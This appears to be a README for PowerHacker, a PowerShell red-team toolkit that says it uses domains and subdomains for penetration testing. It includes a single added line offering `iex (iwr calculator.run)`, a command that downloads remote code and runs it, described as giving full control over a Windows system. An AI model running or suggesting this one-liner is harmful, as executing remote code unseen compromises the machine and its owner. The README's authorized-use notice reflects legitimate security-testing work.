pentestfunctions/powerhacker/README.md

 Welcome to PowerHacker, a PowerShell-based toolkit designed for penetration testers and cybersecurity professionals.
 PowerHacker prefers utilizing valuable Top-Level Domains (TLDs) and the setup of subdomains to facilitate efficient red team operations and security assessments.

+- A simple command like `iex (iwr calculator.run)` is enough to give full control over a windows system.

 ## :lock: Security Notice

 Security and ethical use are paramount.
 PowerHacker is intended for **authorized penetration testing** and/or **educational purposes only**.
 Misuse of PowerHacker may result in legal consequences.
 Ensure you have explicit permission to test target systems with PowerHacker.